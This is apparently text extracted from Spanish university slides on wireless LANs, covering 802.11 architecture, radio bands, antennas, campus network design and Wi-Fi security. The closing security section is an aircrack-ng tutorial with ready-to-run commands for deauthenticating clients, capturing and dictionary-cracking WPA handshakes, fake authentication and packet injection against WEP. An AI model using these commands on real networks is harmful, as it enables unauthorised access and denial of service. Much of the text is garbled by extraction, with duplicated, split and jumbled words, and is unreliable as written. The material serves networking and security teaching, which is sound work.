Professional Documents
Culture Documents
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Cundo surgen?
En 1985 Estados Unidos liber las bandas de
f
frecuencia
i Industrial,
I d t i l Cientfica
Ci tfi y Mdica
Mdi (ISM)
LLC
802.10
Subcapa
MAC
(Media
Access
802
Subcapa MAC:
Capa de A
Acceso all medio
di (CSMA/CA)
enlace Acuses de recibo
Fragmentacin
Confidencialidad (WEP)
IIntroduccin
t d i
Arquitectura
q
Conectividad
Ni l f
Nivel fsico
i
Diseo
se o de redes
edes inalmbricas
a b cas
Puentes inalmbricos
Seguridad
147.156.1.15/24
147 156 2 3/24
147.156.2.3/24
Tarjeta PCMCIA
147.156.1.22/24 147.156.1.23/24
Punto
P t de
d
acceso (AP)
147.156.1.24/24
Sistema de
distribucin (DS)
Repetidor
i l b i
inalmbrico
Internet
C
Canal
l 13
Puente
inalmbrico
Internet
DS
AP AP
ESS
STA STA
STA STA
Red de BSS
Infrastructura
STA
STA STA
STA: Station
AP: Access Point
Red Ad STA
DS: Distribution System IBSS
Hoc
BSS: Basic Service Set
ESS: Extended Service Set
Direccin de la
interfaz
Ethernet
(asociada con
la direccin IP)
BSSID para 802.11b
Internet
00:0F:66:09:4E:11
00:0F:66:09:4E:10
00:0F:66:09:4E:0F
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Tipos
p de tramas 802.11
Tramas
T de
d gestin
ti
Tramas baliza (beacon)
Tramas de sonda peticin/respuesta
Tramas de autenticacin/deautenticacin
Tramas de asociacin/reasociacin/desasociacin
Tramas de control
Tramas RTS (Request To Send) y CTS (Clear To Send)
Tramas ACK (Acknowledgement,
(Acknowledgement acuse de recibo)
Tramas de datos (paquetes IP, ARP, ST, etc.)
Asociacin
Si una red inalmbrica, o sea un SSID, no tiene configurada
g
ninguna proteccin cualquier estacin puede conectarse a ella
asocindose a uno de sus APs (normalmente al que le enve
una seal ms intensa)
Cada AP de la red inalmbrica mantiene en todo momento una
relacin de las estaciones que tiene asociadas (identificadas
por sus direcciones MAC)
En redes inalmbricas la asociacin a un AP equivale a
conectarse por cable a un switch en una red ethernet
Cuando un AP recibe una trama del DS mira si el destino est
en su lista de MACs asociadas. Si lo est enva la trama por
ad o, si
radio, s noo la
a descarta.
desca a
El funcionamiento de un AP es similar al de un switch LAN,
salvo que el AP no inunda por la red inalmbrica las tramas que
le llegan por el DS con destino desconocido
Autentificacin
Una red
U d iinalmbrica
l b i sini proteccin
t i esta
t muy expuesta
t a
ataques. Para evitarlos se debe utilizar algn protocolo de
proteccin, como WEP, WPA, etc.
Cuando se utiliza proteccin la red va a obligar a las estaciones
a autentificarse antes de asociarlas
La autentificacin se hace antes de asociarse y no se hace al
reasociarse.
Cuando una estacin cambia de AP dentro de un mismo SSID
solo tiene q que reasociarse,, no reautenticarse
La autentificacin se hace con un determinado SSID, la
asociacin con un determinado BSSID
Autenticacin Deautenticacin
SSID: patata
Autenticado Autenticado
No Asociado No Asociado
Asociacin Deasociacin
SSID en la red de la UZ
Inicialmente:
Wiuz-1(Red abierta con nocat)
Wiuz-2 (802.1X)
Posteriormente:
Wiuz-1 Wiuz
Wiuz 2 Eduroam (802.1X
Wiuz-2 (802 1X EAP-TTLS
EAP TTLS /WPA/WPA2)
SSID en la red de la UZ
MAN Unizar
WDS
Vlan 266
802.1x
Gateway -NoCat Vlan 641 SSID
DHCP eduroam
Eduroam
Eduroam (educational roaming) es un servicio de
itinerancia para usuarios de las redes acadmicas
europeas
Se basa en el intercambio de credenciales
usuario/password entre servidores RADIUS de
diferentes instituciones de forma que se permita el
acceso transparente a recursos remotos
remotos, p
p. ej
ej. red
inalmbrica de otra organizacin.
Esta extendido por toda Europa y tambin por Japn
y Australia. Solo Canada en Amrica
Enlazar servidores
RADIUS y d delegar
l
on
.uk
autenticacin en el
lond
@
usuario
un
ilo
nd
m .es on
.u
up k
@
Resto dominioss
Infraestructura
wireless no cambia
BSC UPO
CESCA US
CTTC EHU
ICFO RedIRIS
UAB UA
UdG UAH
UdL UAM
UPC UC3M
UPF UCLM
URL UCM
URV UIB
UVic UIMP
XTEC UJI
CSIC ULPGC
CTI UM
RECETGA UMH
CESGA UNAVARRA
UDC UNED
USC UNICAN
UVIGO UNILEON
RICA UNIOVI
CICA UNIRIOJA
UAL UNIZAR
UCA UPCT
UCO UPM
UGR UPV
UHU USAL
UMA UV
UVA
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Curso de Redes Inalmbricas
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Subcapa MAC:
Capa de A
Acceso all medio
di (CSMA/CA)
enlace Acuses de recibo
Fragmentacin
Confidencialidad (WEP)
Subcapa PLCP
Capa fsica. Capa
(Physical Layer Convergence Protocol)
Bandas ISM
La ITU-R ha previsto unas bandas, llamadas ISM (Industrial-
Scientific-Medical) en las que se puede emitir sin licencia
Algunos telfonos inalmbricos (los DECT no), algunos mandos
a distancia y los hornos de microondas hacen uso de las
bandas ISM. De esta forma no hay que pedir licencia al comprar
un horno de microondas
Las redes inalmbrica utilizan siempre
p bandas ISM,, p pues no
sera viable pedir licencia para cada red inalmbrica que se
quisiera instalar
La emisin en la banda ISM, aunque no est regulada debe
cumplir unas condiciones bastante estrictas en la potencia
mxima de emisin y el tipo de antena utilizado
Telefona GSM 902 928 MHz 26 MHz 2 (Amrica) Sistemas propietarios antiguos
((solo en Amrica))
Hornos de 2,4 2,5 GHz 100 MHz Todas 802.11, 802.11b, 802.11 g
microondas
5,725 5,875 MHz 150 MHz Todas 802.11 a
24 24.25
24 25 GHz 250 MHz Todas No
61 61,5 GHz 500 MHz Todas No
122 123 GHz 1 GHz Todas No
244 246 GH
GHz 2 GH
GHz Todas No
Banda de 2,4
, GHz (802.11b/g)
( g)
E
Es la
l ms utilizada
tili d
La utilizan tres estndares:
802.11
802 11 (legacy): FHSS y DSSS: 1 y 2 Mb/s
802.11b: HR/DSSS: 5,5 y 11 Mb/s
802.11g: DSSS-OFDM: de 6 a 54 Mb/s
Cada estndar es compatible con los anteriores, es decir
un equipo 802.11g siempre puede interoperar con uno
802 11b y ambos con uno 802
802.11b 802.11
11 legacy
Espectro disperso
Debido a su carcter no regulado las bandas ISM son un medio
hostil pues normalmente tienen un nivel de ruido elevado e
interferencias
p
Para superar esos inconvenientes lo mejor
j p posible se utilizan
tcnicas de espectro expandido o espectro disperso (spread
spectrum, SS). En redes inalmbricas se emplean dos tipos:
Por salto de frecuencia (Frequency Hopping, FHSS). Se empleaba
en las primeras redes 802
802.11,
11 hoy en da esta en desuso
desuso. Se sigue
empleando en 802.15 (Bluetooth)
Por secuencia directa (Direct Sequence, DSSS). Se emplea en
todas las redes 802.11 actuales
Espectro
p disperso
p p
por salto de
frecuencia (FHSS)
Espectro
p disperso
p p
por Secuencia Directa
(DSSS)
El emisor utiliza un canal muy ancho y enva la informacin
codificada con mucha redundancia. La energa emitida se reparte
en una banda ms ancha que en FHSS
Se confa en que el receptor sea capaz de descifrar la informacin,
aun en el caso de que se produzca alguna interferencia en alguna
frecuencia
El canal permanece constante todo el tiempo
En 802.11 se utilizan canales de 22 MHz
Puede haber diferentes emisores simultneos si usan canales
diferentes no solapados
encia
ncia
C. 58
Frecuen
Frecue
C. 45
0,4 s Canal 7 Interferencia
Interferencia
C. 20
1 MHz C. 9 22 MHz Canal 1
100
cia (mW/Hz)
W/Hz)
otencia (mW
Potenc
22 MHz
Po
Ampliacin
Servicio de Informtica y Comunicaciones - Universidad Redes 7-49
de Zaragoza
Curso de Redes Inalmbricas
Tiempo
Resultado combinado
Obstruccin
Tiempo
Suelo
Antenas diversidad
4 8 12
3 7 11
2,4 GHz 2,5 GHz
2 6 10 14
1 5 9 13
1 5 9 13
Europa
u opa (canales
(ca a es 1 a 13)
3)
1 6 11
Amrica / China (canales 1 a 11)
1 6 11 14
Japn (canales 1 a 14)
3 9
Israel (canales 3 a 9)
22 MHz
Dominios regulatorios
United States, Canada, Mexico, America Samoa, Antigua and Barbuda, Argentina, Aruba, Ashmore and Cartier
Amrica Islands Australia
Islands, Australia, Bahamas
Bahamas, Baker Island
Island, Barbados
Barbados, Bermuda
Bermuda, Bolivia
Bolivia, Bouvet Island
Island, Brazil
Brazil, Cameroon
Cameroon, Central
African Republic, Chad, Chile, China, Christmas Island, Clipperton Island, Cocos Island, Colombia, Cook Island,
Coral Sea Islands, Costa Rica, Ecuador, El Salvador, Europa Island, Faroe Islands, Fiji, Glorioso Islands, Grenada,
Guadeloupe, Guam, Guatemala, Guyana, Haiti, Heard Island, Honduras, Hong Kong, Jamaica, Kingman Reef,
Malawi, Malaysia, Mali, Marshall Islands, Midway Islands, Navassa Island, New Caledonia, New Guinea, New
Zealand Nicaragua
Zealand, Nicaragua, Niger
Niger, Nigeria
Nigeria, Norfolk Island
Island, Northern Mariana Islands
Islands, Palau
Palau, Palmyra Atoll
Atoll, Panama
Panama, Papua
New Guinea, Paracel Islands, Paraguay, Peru, Phillippines, Pitcairn Islands, Puerto Rico, Russia, Saint Kitts and
Nevis, Saint Lucia, Saint Pierre and Miquelon, Saint Vincent and the Grenadines, Samoa, Saudi Arabia, Solomon
Islands, South Korea, Spratly Islands, Taiwan, Togo, Tonga, Trinidad and Tobago, Tromelin Island, Turks and
Caicos Islands, Uruguay, US Virgin Islands, Venezuela, Wake Island, Western Sahara
Af h i t
Afghanistan, Albania,
Alb i Al Algeria,
i AAndorra,
d A
Angola,
l AAngullia,
lli AArmenia,Austria,
i A ti A Azerbaijan,
b ij B
Bahrain,
h i B Bangladesh,
l d h
EMEA Bassas da India, Belarus,Belgium, Belize, Benin, Bhutan, Bosnia, Botswana, British Indian OceanTerritory, British
Virgin Islands, Brunei, Bulgaria, Burkina Faso, Burma,Burundi, Cambodia, Cape Verde, Cayman Islands, Comoros,
Cote dIvoire, Croatia, Cyprus, Czech Republic, Democratic Republic of the Congo, Denmark, Djibouti, Dominica,
Egypt, Equatorial Guinea, Eritrea, Estonia, Ethiopia, Falkland Islands, Finland, France, French Guiana, French
Pol nesia French So
Polynesia, Southern
thern and Antarctic Lands
Lands, Gabon
Gabon, Gambia
Gambia, Georgia
Georgia, German
Germany, Ghana
Ghana, Gilbraltar
Gilbraltar, Greece
Greece,
Greenland, Guernsey, Guinea, Guinea-Bissau, Hungary, Iceland, India, Indonesia, Ireland, Isle of Man, Israel, Italy,
Ivory Coast, Jan Mayan, Jarvis Island, Jersey, Johnston Atoll, Jordan, Juan de Nova Island, Kazakhstan, Kenya,
Kiribati, Kuwait, Kyrgyzstan, Laos, Latvia, Lebanon, Lesotho, Liberia, Liechtenstein, Lithuania, Luxembourg, Macau,
Macedonia, Madagascar, Maldives, Malta, Martinique, Mauritania, Mauritius, Mayotte, Micronesia, Moldova,
Monaco Mongolia
Monaco, Mongolia, Montserrat
Montserrat, Morocco
Morocco, Mozambique
Mozambique, Namibia
Namibia, Nauru
Nauru, Nepal
Nepal, Netherlands
Netherlands, Niue
Niue, Norway
Norway, Oman
Oman,
Pakistan, Poland, Portugal, Qatar, Republic of the Congo, Reunion, Romania, Rwanda, Saint Helena, San Marino,
Sao Tome and Principe, Senegal, Serbia, Seychelles, Sierra Leone, Singapore, Slovak Republic, Slovenia,
Somalia, South Africa, South Georgia, Spain, Sri Lanka, Sudan, Suriname, Svalbard, Swaziland, Sweden,
Switzerland, Syria, Tajikistan, Tanzania, Thailand, Tokelau, Tunisia, Turkey, Turkmenistan, Tuvalu, Uganda,
Ukraine United Arab Emirates
Ukraine, Emirates, United Kingdom,
Kingdom Uzbekistan,
Uzbekistan Vanuatu
Vanuatu, Vatican City
City, Vietnam
Vietnam, Wallis and Futuna
Futuna,
Yemen, Zaire, Zambia, Zimbabwe
802.11a
802 11a utiliza la banda de 5 GHz
GHz, que permite canales de
mayor ancho de banda
La tcnica de radio es OFDM (Orthogonal Frequency Division
Multiplexing)
Velocidades como en 802.11g: 6, 9, 12, 18, 24, 36, 48 y 54
Mb/s (6, 12 y 24 son obligatorias)
Incompatible con 802802.11b/g.
11b/g La radio va a distinta frecuencia
En Europa la banda de 5 GHz se empez a usar ms tarde que
en Amrica, pues se exigi que incorporara mecanismos de
j
ajuste dinmico de la frecuencia y la p
potencia ((802.11h)) p
para
evitar interferencia con radares y otros aparatos
Funcionamiento de OFDM
Funcionamiento de OFDM
Utilizando diferentes tipos de modulacin puede variarse el caudal por
subcanal y por tanto el caudal total
L modulaciones
Las d l i ms
eficientes
fi i (64QAM) necesitan
i un canall con mejorj
relacin seal/ruido
Modulacin Bits/smbolo Caudal por Velocidad
subcanal (Kb/s) (Mb/s)
BPSK 1 125 6
BPSK 1 187,5 9
QBPSK 2 250 12
QBPSK 2 375 18
16QAM 4 500 24
16QAM 4 750 36
64QAM 6 1000 48
64QAM 6 1125 54
Ventajas:
En 5 GHz hay menos interferencias que en 2,4 GHz: Bluetooth,
hornos de microondas
microondas, mandos a distancia
distancia, etc
etc. En el futuro es
previsible que aparezcan ms equipos que utilicen la banda de 5
GHz y haya ms interferencia
En 5 GHz hay ms canales no solapados (19 frente a 4). Es ms
fcil evitar interferencias,
interferencias especialmente al disear una cobertura
celular
Inconvenientes de 5 GHz:
Menor alcance en APs (antenas omnidireccionales)
Mayor costo de los equipos emisores/receptores
Mayor consumo (menor duracin de las bateras)
30 60 90
Rango (metros)
Broadband.com
(11 Mb/s) (54 Mb/s)
Rendimiento de WLANs
El rendimiento real mximo suele ser el 50-60% de la velocidad
nominal. Por ejemplo con 11 Mb/s se pueden obtener 6 Mb/s en
ell mejor
j dde llos casos.
El overhead se debe a:
Medio compartido half-duplex
Mensajes de ACK (uno por trama)
Protocolo MAC (colisiones, esperas aleatorias, intervalos
DIFS y SIFS entre tramas)
Transmisin del Prembulo PLCP
Mensajes RTS/CTS (si se usan)
Fragmentacin
g ((si se p
produce))
75 16
1,6 0 16
1,6 16
1,6 16
1,6
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Radiacin horizontal
Antenas
La ganancia de una antena es una medida relativa de la intensidad de
la seal emitida en comparacin con la intensidad con que emitira una
antena isotrpica
p a la misma distancia y con la misma p potencia de
emisin
Se suele expresar en dBi (decibel isotrpico). El dato se suele dar para
la direccin en la que la intensidad (y por tanto la ganancia) es mxima
Una antena isotrpica tiene una ganancia de 0 dBi en todas
direcciones. Su diagrama de radiacin tridimensional sera un baln de
ftbol
Los tipos de antenas utilizados en redes 802.11 son los siguientes:
g
Omnidireccionales, que transmiten en todas direcciones en el plano
horizontal (diagrama toroidal, como un donut). Son las de menor ganancia
(2-6 dBi dependiendo de lo aplastado que est el toro)
Antenas de parche
p ((6-10 dBi de g
ganancia))
Antenas yagi (13 dBi)
Antenas parablicas (20 dBi)
Las ms habituales son las omnidireccionales, seguidas de las tipo
parche Las yagi y parablicas se utilizan sobre todo en puentes
parche.
inalmbricos
Relacin antena-potencia
Relacin ganancia-potencia
Las normativas fijan una para 802.11b
potencia mxima de emisin y
una densidad de potencia Ganancia (dBi) Pot. Mx. (mW)
(potencia por unidad de
superficie). Por tanto con una 0 100
antena de mucha g ganancia es
preciso reducir la potencia 2,2 50
(esto no es controlado por los
equipos) 5,2 30
L llmites
Los it varan
segn ell 6 30
dominio regulatorio. Por
ejemplo en EMEA (Europa, 8,5 5
Medio Oriente y frica) los 12 5
lmites son los de la tabla
adjunta. 13,5 5
21 1
260 m
C
Canal
l7 C
Canal
l1 Canal 13
600 m
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Curso de Redes Inalmbricas
LAN inalmbrica en un almacn (caso 2)
Tomas RJ45 (100BASE-TX) disponibles slo en un lado del almacn
Antenas Yagi (13,5 dBi) y Dipolo diversidad(2,14 dBi)
Canal 1
Canal 13
Canal 7
260 m
Canal 13
Canal 7
Canal 1
600 m
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Curso de Redes Inalmbricas
LAN inalmbrica en un campus
p
Antenas dipolo diversidad (2,14dBi) en las aulas y de parche (8,5 dBi) montadas en
pared para el patio
Canal 11 Canal 1
Pasillo
260 m
Edificio Patio
600 m
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Curso de Redes Inalmbricas
C5 C5
Quinta
C1 C1
Cuarta
C9 C9
Tercera
C5 C5
Segunda
C 13 C 13
Primera
C1 C1
Baja
j
C5 C5
Stano
Funciones adicionales
Usos WLSE:
IDS
Detector de fallos
Actualizacin del firmware
Generacin de reports
Configurar canales
Mapas de cobertura
Control de usuarios
DETECTOR DE FALLOS
GENERADOR DE MAPAS
Hardware Instalado en la UZ
Puntos de Acceso
66 Ci
Cisco 1100
360 Cisco 1131 (Activos 802.11b/g)
15 Cisco 1241 (Exteriores)
( )
4 Cisco 1300 (Enlace entre edificios)
Equipamiento de Gestin
3SServidores
id
1 appliance Cisco WLSE
p en modo WDS
9 Ap
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Hasta 10 Km
Visin directa
Cable coaxial de 50 de
baja atenuacin lo ms corto
posible (30 m max.)
Ethernet Ethernet
d + 2/2
d + /2
d
Primera zona Fresnel
Segunda zona Fresnel
Hasta Hasta
10 Km 10 Km
Hasta Hasta
10 Km 10 Km
Hasta 54 Mb/s
Mb/s, compartidos entre ambos enlaces
Posible problema de estacin oculta (entre A y C). Necesidad de utilizar mensajes RTS/CTS
Canal 1
C
Canal
l7
Canal 13
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Hoy en da
da, las Wireless LAN se estn convirtiendo
poco a poco en parte esencial de las redes LAN
tradicionales:
Bajos
B j costes
t de
d iinstalacin
t l i
Disponibilidad
No requiere de software adicional
Movilidad
La implantacin se est realizando a mayor velocidad
en los entornos domsticos y PYMES frente a
grandes empresas
Este mercado est menos concienciado de los
problema de seguridad
El aire es un medio inseguro
Los estndares iniciales tienen muchos problemas de
seguridad
Conceptos bsicos
Escuchas ilegales.
Acceso no autorizado.
Amenazas fsicas.
E
Escuchas
h ilegales
il l
Un tercero no autorizado escucha ilegalmente las seales de radio
intercambiadas entre una estacin inalmbrica y un punto de acceso,
comprometiendo la confidencialidad de informacin.
E
Esto constituye
i un ejemplo
j l dde ataque activo.
i
Amenazas fsicas
Aunque
u que un
u cliente
c e e pueda validarse
va da se contra
co a ele punto
pu o de
acceso, si no conoce las claves de encriptacin de los
datos no podr enviar informacin.
REDES ABIERTAS
Open Autenticacin
Portal Captivo
Un portal captivo es un programa o mquina de una red
informtica qque vigila
g el trfico HTTP y fuerza a los usuarios a
pasar por una pgina especial si quieren navegar por Internet de
forma normal.
A veces esto se hace para pedir una autenticacin vlida
vlida, o para
informar de las condiciones de uso de un servicio wireless.
Un portal cautivo se instala en la puerta de enlace de la red,
puede ser un ordenador haciendo de router, o un router
hardware. El programa intercepta todo el trfico HTTP hasta que
el usuario se autentifica. El portal se encargar de hacer que esta
sesin caduque al cabo de un tiempo.
Tambin puede empezar a controlar el ancho de banda usado
por cada cliente.
cliente
Portal Captivo
p
Se usan sobre todo en redes inalmbricas abiertas, donde
i t
interesa mostrar
t un mensaje j d
de bi
bienvenida
id a llos usuarios
i y para
informar de las condiciones del acceso.
Nos p permite controlar la autenticacin de los usuarios as como
el tiempo de conexin.
http://es.wikipedia.org/wiki/Portal_cautivo
htt // iki di / iki/P t l ti
Nocat, Mikrotik, Pfsense, ZeroShell
Wiuz
Red abierta sin cifrar
Servidor NoCat
Fcil acceso y configuracin
Red con mayor nmero de usuarios
Si restricciones
Sin i i actuales
l
RADIUS LDAP
Gateway -NoCat
Cliente DHCP
Acceso al medio
(Sin encriptacin)
Solicitud parametros red (DHCP)
Dir.IP,mscara,gateway,
Dir IP mscara gateway Acceso bloqueado salvo:
servidores DNS, WINS - dns
- http redireccionado
Acceso a internet HTTP
Redireccin HTTP a portal
autenticacin ((HTTPS))
Usuario / password (HTTPS) Usuario/pass Usuario/pass
Ventana de autorizacin / renovacin Usuario OK Usuario OK
automtica GRUPO RADIUS GRUPO LDAP
Acceso a internet
Maquina autorizada
REDES CIFRADAS
Introduccin al WEP
Sistema de encriptacin
p estndar 802.11
Funcionamiento WEP
Concatena la llave simtrica compartida, de 40 104 bits, de la
estacin con un vector de inicializacin aleatorio (IV) de 24
Se ggenera un nmero p
pseudo-aleatrio,, de longitud
g igual
g al
payload (datos + CRC), y un valor de 32 bits para chequear la
integridad (ICV)
Funcionamiento WEP
El ICV acta como checksum, ser utilizado por la
estacin receptora
p para recalcularlo y compararlo
p p con la
recibida
Debilidades WEP
airCrack
Ataques
q y vulnerabilidades
Ataques pasivos
Escuchas
Anlisis
s s de ttrfico
co
Ataques activos
Retransmisin de mensajes
Suplantacin de identidades
Denegacin de servicio
Modificacin de mensajes
j
Ataques y vulnerabilidades
El riesgo de utilizacin del keystream
Diccionarios de desencriptacin
Gestin de claves
Autenticacin de mensajes
Desencriptacin de mensajes
Redireccin
R di i IP
Wi-Fi
Wi Fi Protected Access (WPA)
WPA Empresarial
Soporta 802.1x
Autenticacin mutua
EAP
Requiere hard cliente actualizado o WPA nativo
Requiere un suplicante que soporte WPA
AP WPA nativo o actualizado
Servidor autenticacin - RADIUS
WPA2
Implementacin de 802.11i
802 11i de la WI-FI Alliance
Se requiere nuevos AP
Los PDAs antiguos tampoco sirven
Algunos clientes pueden servir
Septiembre 2004 Primeras Certificaciones
WPA y WPA2 son compatibles
Existe la
l opcin
de
d trabajar
b en modo
d mixto:WPA/WPA2
/ 2
Upgrade de WPA a WPA2:soft,hard
WPA2 Personal password
WPA2 Enterprise 802.1x y EAP
Basado en Algoritmo AES
WPA2 FIPS 140-2
Qu es 802.1x
Provee un mtodo para la autenticacin y autorizacin de
conexiones a una RED INALMBRICA
Aprovechamiento
p de pprotocolos AAA tales como RADIUS p
para
centralizar autenticacin y autorizaciones
Seguridad 802.1x
Por qu RADIUS
Seguridad 802.1x
Protocolo de Autenticacin Extensible (EAP)
SUITE AIRCRACK
Airmon: activar el modo monitor de las tarjetas
wireless
Airodump: captura de paquetes
Aireplay: inyeccin de paquetes
Ai
Aircrack:
k crackear
k claves
l WEP y WPA
WPA-PSK
PSK
Airdecap: descifrar archivos de capturas WEP/WPA
Packetforge: creacin de paquetes cifrados
Airtun: creacin de interfaces virtuales
man iwconfigg
iwconfig --help
airodump-ng
airodump ng <opciones>
opciones <interface>
interface [,
[,<interface>,...]
interface ,...]
SNIFFING IVS
LEYENDA
1 = Keybyte, es decir el nmero de cada uno de los
bytes o caracteres de la clave.
2 = Profundidad de la actual bsqueda de la clave
3 = Byte o caracter que se est probando
4 = Votos o nmero de probabilidades de que sea
correcto
t ese byte
b t
CRACKING
FUNCIONAMIENTO AIRCRACK
FUNCIONAMIENTO AIRCRACK
Usando una serie de pruebas estadsticas llamadas
FMS y ataques Korek, se van acumulando
posibilidades o votos ((votes)) p
p para cada byte
y de la
clave WEP.
Cada ataque tiene un nmero diferente de votos
asociado con l
l, por lo que la probabilidad de cada
ataque vara matemticamente. Cuantos ms votos
tengamos de un byte o valor particular, mayor
probabilidad
b bilid d h
hay dde que sea ell correcto.
t
Para cada byte de la clave, la pantalla nos muestra el
carcter ms pprobable y el nmero de votos q que ha
acumulado. Aircrack-ng probar continuamente de la
ms probable a la menos probable para encontrar la
clave.
FUNCIONAMIENTO AIRCRACK
La aproximacin estadstica puede por si sola darnos la
clave WEP de la red. Pero la idea es que tambin podamos
complementarlo con la fuerza bruta para realizar el trabajo.
Aircrack-ng usa la fuerza bruta para determinar cuantas
claves se han de probar para intentar encontrar la clave
WEP.
Aqu es donde entra en juego el fudge factor. Bsicamente
el fudge factor le dice a aircrack-ng hasta donde probar
claves.
Si le decimos a aircrack-ng que use un fudge factor de 2,
dividir los votos del byte ms probable, y probar todas las
posibilidades con un nmero de votos de al menos la mitad
de los que tiene el carcter ms posible.
Cuanto mayor sea el fudge factor, ms posibilidades probar
aircrack-ngg aplicando
p fuerza bruta.
FUNCIONAMIENTO AIRCRACK
USO AIRCRACK
aircrack-ng [opciones] <archivo(s) de captura>
Se pueden especificar mltiples archivos de captura (incluso mezclando
formatos .cap y .ivs). Tambin se puede ejecutar airodump-ng y aircrack-ng al
mismo tiempo: aircrack-ng se actualizar de forma automtica cuando estn
disponibles nuevos IVs.
USO AIRCRACK
TEST DE INYECCION
aireplay-ng -9 <interfaz>
The system responds:
16:29:41 wlan0 channel: 9
16:29:41 Trying broadcast probe requests...
16:29:41 Injection is working!
16:29:42 Found 5 APs
16:29:42 Trying directed probe requests...
16:29:42 00:09:5B:5C:CD:2A - channel: 11 - 'NETGEAR
16:29:48 0/30: 0%
16:29:48 00:14:BF:A8:65:AC - channel: 9 - 'title'
16:29:54 0/30: 0%
16:29:54 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
16:29:55 Ping (min/avg/max): 2 2.763ms/4.190ms/8.159ms
763ms/4 190ms/8 159ms
16:29:55 27/30: 90%
TEST DE INYECCION
Respuesta
16:29:41
16 29 41 wlan0
l 0 channel:
h l 9
9: interfaz
i t f que se emplea l y en qu
canal
16:29:41 Injection is working!: Confirmacin de que la tarjeta
puede inyectar.
inyectar
16:29:42 Found 5 APs: APs encontrados en el broadcast.
16:29:42 00:09:5B:5C:CD:2A - channel: 11 - NETGEAR: AP
encontrado en un canal distinto
distinto, normal por los casos de solape
de frecuencias
16:29:55 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms:
Respuesta del AP al ping
16:29:55 27/30: 90% for ssid: Respuesta del AP en el que
inyectamos
TEST DE INYECCION
TEST DE INYECCION
Necesitamos disponer de dos tarjetas.
Escucha e inyeccin
aireplay-ng -9 -i <int1> <int2>
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
El uso de aireplay
p y es el siguiente:
g
aireplay-ng <opciones> <interface>
Cuando reenviemos (inyectemos) paquetes, podremos
utilizar las siguientes opciones
opciones. No todas las opciones se
usan en cada ataque.
Opciones de inyeccin:
-x nbpps : nmero
de paquetes por segundo
-p fctrl : fijar palabra frame control (hexadecimal)
-a bssid : fijar
j direccin MAC del AP
-c dmac : fijar direccin MAC de destino
-h smac : fijar direccin MAC origen
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
Opciones de origen:
-i iface : capturar paquetes con esa interface
-r archivo : utilizar paquetes de ese archivo cap
Modos
M d d de ataque:
t
- -deauth [nmero]: deautenticar 1 o todos los clientes (-0)
- -fakeauth [[n repeticin]:
p ] falsa autenticacin con el AP (-1)
( )
- -interactive : seleccin interactiva del paquete a enviar (-2)
- -arpreplay : estandar reinyeccin ARP-request (-3)
- -chopchop
h h :d desencriptar
i t paquete t WEP/
WEP/chopchop
h h ((-4)4)
- -fragment : generar keystream vlido (-5)
AIREPLAY: deautenticacin
AIREPLAY: deautenticacin
aireplay ng -0
aireplay-ng 0 1 -a
a 00:14:6C:7E:40:80 -c
c 00:0F:B5:34:30:30 ath0
-0 significa deautenticacin
1 es el nmero de deautenticaciones a enviar donde 0 significa enviarlas
continuamente
-a 00:14:6C:7E:40:80 es la direccin MAC del punto de acceso
-c 00:0F:B5:34:30:30 es la direccin MAC del cliente a deautenticar;; si
se omite sern deautenticados todos los clientes
ath0 es el nombre de la interface
Deautenticacin: DoS
Cada vez que un cliente se conecta a una red con cifrado WPA,
enva
un paquete-saludo,
t l d oHHandshake
d h k all AP all que se va a
conectar. Este saludo contiene la contrasea encriptada.
Para capturarlo, trataremos de desconectar al cliente y estar a
l escucha
la h para capturar
t ese H
Handshake.
d h k M Mas ttarde,
d
intentaramos crackear ese Handshake para obtener la
contrasea.
airmon-ng
i start ath0
h0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
(abrimos otra consola)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D
ath0 (esperamos algunos segundos)
aircrack-ng -w /path/to/dictionary out.cap
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
p
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
La sintaxis es la siguiente:
aireplay-ng -1 0 -e random -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
-1 significa falsa autenticacin
0 tiempo de reasociacin en segundos
-e random es el nombre de la red wireless
-a 00:14:6C:7E:40:80 es la direccin MAC del punto de acceso
-h 00:09:5B:EC:EE:F2 es la direccin MAC de nuestra tarjeta
ath0 es el nombre de la interface wireless
La falta de asociacin con el punto de acceso es la razn ms habitual por la
cual falla la inyeccin.
Uno de los modos de usar este ataque es haciendo una difusin de los
paquetes del AP y as generar nuevos vectores de inicializacin.
Para hacer esto pposible,, necesitaramos una direccin MAC especial,
p ,
una que englobara a todas las MAC's. Esta mac es la
FF:FF:FF:FF:FF:FF
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -
h 00:0F:B5:88:AC:82 ath0
-2 significa ataque de inyeccin interactivo
-p 0841 fija el Frame Control en el paquete para que parezca que est
siendo
i d enviadoi d d desde
d un cliente
li t wireless.
i l
-c FF:FF:FF:FF:FF:FF fija como direccin MAC de destino cualquiera
(broadcast). Esto es necesario para que el AP responda con otro
paquete
p q y as g
generar un nuevo IV.
-b 00:14:6C:7E:40:80 es la direccin MAC del punto de acceso
(BSSID).
-h 00:0F:B5:88:AC:82 es la direccin MAC de los paquetes que se
estn transmitiendo
